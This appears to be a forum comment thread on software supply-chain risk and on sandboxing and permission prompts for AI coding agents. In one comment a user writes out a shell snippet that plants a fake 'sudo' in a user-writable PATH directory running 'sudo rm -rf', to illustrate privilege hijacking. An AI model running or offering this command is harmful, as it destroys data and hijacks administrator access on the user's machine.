And nothing big has happened despite all the risks and problems that came up with it. People keep chasing speed and convenience, because most things don’t even last long enough to ever see a problem.
A number of these supply chain compromises had incredibly high stakes and were seemingly only noticed before paying off by lucky coincidence.
The fun part is, there have been a lot of non-misses! Like a lot! A ton of data have been exfiltrated, a lot of attacks, and etc. In the end... it just didn't matter.
Your analogy isn't really apt either. My argument is closer to "given in the past decade+, nothing of worth has been harmed, should we require airbags and seatbelts for everything?". Obviously in some extreme mission critical systems you should be much smarter. But in 99% cases it doesn't matter.
By now, getting a car without airbags would probably be more costly if possible, and the seatbelt takes 2s every time you're in a car, which is not nothing but is still very little. In comparison, analyzing all the dependencies of a software project, vetting them individually or having less of them can require days of efforts with a huge cost.
We all want as much security as possible until there's an actual cost to be paid, it's a tradeoff like everything else.
These are generally (but not always) 2 different sets of people.
Industry caught on quick though.
Unreliable, unpredictable AI agents (and their parent companies) with system-wide permissions are a new kind of threat IMO.
I think the actual data flow here is really hard to grasp for many users: Sandboxing helps with limiting the blast radius of the agent itself, but the agent itself is, from a data privacy perspective, best visualized as living inside the cloud and remote-operating your computer/sandbox, not as an entity that can be "jailed" and as such "prevented from running off with your data".
The inference provider gets the data the instant the agent looks at it to consider its next steps, even if the next step is to do nothing with it because it contains highly sensitive information.
/rant
If you do use a sandbox, be prepared to endlessly click "Approve" as the tool struggles to install python packages to the right location.
echo -e '#!/bin/sh\nsudo rm -rf/\nexec sudo "$@"' >~/.local/bin/sudo
chmod +x ~/.local/bin/sudo
Especially since $PATH often includes user-writeable directories.It was installing packages somewhere and then complaining that it could not access them in the sandbox.
I did not look into what exactly was the issue, but clearly the process wasn't working as smoothly as it should. My "project" contained only PDF files and no customizations to Codex, on Windows.
A real sandbox doesn't even give the software inside an option to extend it. You build the sandbox knowing exactly what you need because you understand what you're doing, being a software developer and all.
And I imagine it's going to be the same for most developers out there, thus the "ask for permission" model.
That model seems to work quite well for millions of developers.
As we just discussed, obviously you are likely to need internet access at some point.
The agent can decide whether it believes it needs to go outside of the sandbox and trigger a prompt.
This way you could have it sandboxed most of the time, but still allow access outside of the sandbox when you know the operation requires it.
I have noticed it's become one of my most searched posts on Google though. Something like ten clicks a month! So at least some people aren't stupid.
Nice article.
We've seen an increase in hijacked packages installing malware. Folks generally expect well known software to be safe to install. I trust that the claude code harness is safe and I'm reviewing all of the non-trivial commands it's running. So I think my claude usage is actually safer than my AUR installs.
Granted, if you're bypassing permissions and running dangerously, then... yea, you are basically just giving a keyboard to an idiot savant with the tendency to hallucinate.
Only a matter of time before this type of access becomes productized.